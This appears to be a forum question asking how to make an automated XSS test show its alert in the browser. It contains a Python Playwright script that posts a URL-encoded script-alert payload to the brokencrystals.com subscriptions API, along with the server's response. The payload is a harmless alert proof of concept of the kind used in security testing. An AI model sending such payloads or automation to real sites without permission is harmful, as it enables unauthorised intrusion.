For example, if you go to https://brokencrystals.com site, and in the bottom you have subscriptions field, if you insert xss payload, you'll get an alert. In inspect element you'll see api request/response. So i created simple script to automate it with python and Playwright:
from playwright.async_api import async_playwright
import asyncio
import time
import os
import datetime
from crawler.auth_object import get_headers
async def main():
LOGIN_URL = input("Please enter the login url: ").strip()
BASE_URL = input("Please enter the base url: ").strip()`
async with async_playwright() as p:
browser = await p.firefox.launch(headless=False)
context = await browser.new_context(
user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3",
viewport={"width": 1920, "height": 1080},
base_url=BASE_URL
)
page = await context.new_page()
api_request_context = context.request
await page.goto("https://brokencrystals.com/", timeout=120000)
await page.wait_for_load_state("networkidle", timeout=120000)
response = await api_request_context.post(
"/api/subscriptions?email=%3Cscript%3Ealert%283468021410%29%3C%2Fscript%3E"
)
print(response)
if __name__ == "__main__":
asyncio.run(main())`
printed response:
<APIResponse
url='https://brokencrystals.com/api/subscriptions?email=%3Cscript%3Ealert%283468021410%29%3C%2Fscript%3E'
status=201
status_text='Created'>
means it's ok, but however there is no alert in the screen. Is it possible to make this request, like a regular post request and to get alert in the screen? Please advices
I want to reproduce manual request sending post request, without filling input fields, just to send post request. Pay attention this post request doesn't use post data, it send data through url.. (it actually doesn't important, i just need a way to reproduce it)
Thanks